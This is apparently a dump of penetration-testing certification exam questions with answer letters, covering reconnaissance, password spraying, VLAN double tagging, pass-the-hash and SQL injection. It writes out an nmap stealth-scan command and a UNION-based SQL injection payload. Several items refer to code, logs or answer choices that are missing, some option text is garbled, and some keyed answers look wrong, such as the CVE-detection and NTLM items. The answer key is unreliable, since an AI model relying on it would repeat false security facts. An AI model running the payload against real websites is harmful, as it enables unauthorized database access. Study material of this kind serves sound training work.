The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS? (A). Line 01 (B). Line 02 (C). Line 07 (D). Line 08

(D). Line 08

A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action? (A). ROE (B). SLA (C). MSA (D). NDA

(D). NDA

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout? (A). Mask (B). Rainbow (C). Dictionary (D). Password spraying

(D). Password spraying

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective? (A). Gain access to the target host and implant malware specially crafted for this purpose. (B). Exploit the local DNS server and add/update the zone records with a spoofed A record. (C). Use the Scapy utility to overwrite name resolution fields in the DNS query response. (D). Proxy HTTP connections from the target host to that of the spoofed host.

(D). Proxy HTTP connections from the target host to that of the spoofed host.

A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name. Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results? (A). Specially craft and deploy phishing emails to key company leaders. (B). Run a vulnerability scan against the company's external website. (C). Runtime the company's vendor/supply chain. (D). Scrape web presences and social-networking sites.

(D). Scrape web presences and social-networking sites.

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT? (A). Badge cloning (B). Watering-hole attack (C). Impersonation (D). Spear phishing

(D). Spear phishing Spear phishing is a type of targeted attack where the attacker sends emails that appear to come from a legitimate source, often a company or someone familiar to the target, with the goal of tricking the target into clicking on a malicious link or providing sensitive information. In this case, the penetration tester has already gathered OSINT on the IT systems administrator, so they can use this information to craft a highly targeted spear phishing attack to try to gain access to the target system.

A penetration tester downloaded a Java application file from a compromised web server and identified how to invoke it by looking at the following log: Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets? (A). Run an application vulnerability scan and then identify the TCP ports used by the application. (B). Run the application attached to a debugger and then review the application's log. (C). Disassemble the binary code and then identify the break points. (D). Start a packet capture with Wireshark and then run the application.

(D). Start a packet capture with Wireshark and then run the application.

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal? (A). RFID cloning (B). RFID tagging (C). Meta tagging (D). Tag nesting

(D). Tag nesting, since VLAN hopping by double tagging requires two VLAN tags to be nested in a single frame. Double tagging occurs when an attacker adds and modifies tags on an Ethernet frame to allow the sending of packets through any VLAN. This attack takes advantage of how many switches process tags. Most switches will only remove the outer tag and forward the frame to all native VLAN ports. With that said, this exploit is only successful if the attacker belongs to the native VLAN of the trunk link.

A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted store of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server. Which of the following is the MOST likely reason for the error? (A). TCP port 443 is not open on the firewall (B). The API server is using SSL instead of TLS (C). The tester is using an outdated version of the application (D). The application has the API certificate pinned.

(D). The application has the API certificate pinned.

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment? (A). A signed statement of work (B). The correct user accounts and associated passwords (C). The expected time frame of the assessment (D). The proper emergency contacts for the client

(D). The proper emergency contacts for the client

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server. Which of the following can be done with the pcap to gain access to the server? (A). Perform vertical privilege escalation. (B). Replay the captured traffic to the server to recreate the session. (C). Use John the Ripper to crack the password. (D). Utilize a pass-the-hash attack.

(D). Utilize a pass-the-hash attack.

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the: (A). devices produce more heat and consume more power. (B). devices are obsolete and are no longer available for replacement. (C). protocols are more difficult to understand. (D). devices may cause physical world effects.

(D). devices may cause physical world effects. "A significant issue identified by Wiberg is that using active network scanners, such as Nmap, presents a weakness when attempting port recognition or service detection on SCADA devices. Wiberg states that active tools such as Nmap can use unusual TCP segment data to try and find available ports. Furthermore, they can open a massive amount of connections with a specific SCADA device but then fail to close them gracefully." And since SCADA and ICS devices are designed and implemented with little attention having been paid to the operational security of these devices and their ability to handle errors or unexpected events, the presence of idle open connections may result in errors that cannot be handled by the devices.

A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible. Which of the following Nmap scan syntaxes would BEST accomplish this objective? (A). nmap -sT -vvv -O 192.168.1.2/24 -PO (B). nmap -sV 192.168.1.2/24 -PO (C). nmap -sA -v -O 192.168.1.2/24 (D). nmap -sS -O 192.168.1.2/24 -T1

(D). nmap -sS -O 192.168.1.2/24 -T1

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal? (A). <# (B). <$ (C). ## (D). #$ (E). #!

(E). #!

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware? (A). Analyze the malware to see what it does. (B). Collect the proper evidence and then remove the malware. (C). Do a root-cause analysis to find out how the malware got in. (D). Remove the malware immediately. (E). Stop the assessment and inform the emergency contact.

(E). Stop the assessment and inform the emergency contact.

A penetration tester discovers a critical vulnerability is being actively exploited by attackers. Which of the following should the tester do NEXT? (A). Reach out to the primary point of contact (B). Try to take down the attackers (C). Call law enforcement officials immediately (D). Collect the proper evidence and add to the final report

(A). Reach out to the primary point of contact

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task? (A). Run Nmap with the -o, -p22, and -sC options set against the target (B). Run Nmap with the -sV and -p22 options set against the target (C). Run Nmap with the --script vulners option set against the target (D). Run Nmap with the -sA option set against the target

(A). Run Nmap with the -o, -p22, and -sC options set against the target

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.) (A). Open-source research (B). A ping sweep (C). Traffic sniffing (D). Port knocking (E). A vulnerability scan (F). An Nmap scan

(A). Open-source research (C). Traffic sniffing

A tester who is performing a penetration test on a website receives the following output: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62 Which of the following commands can be used to further attack the website?

(D). 1 UNION SELECT 1, DATABASE(),3--
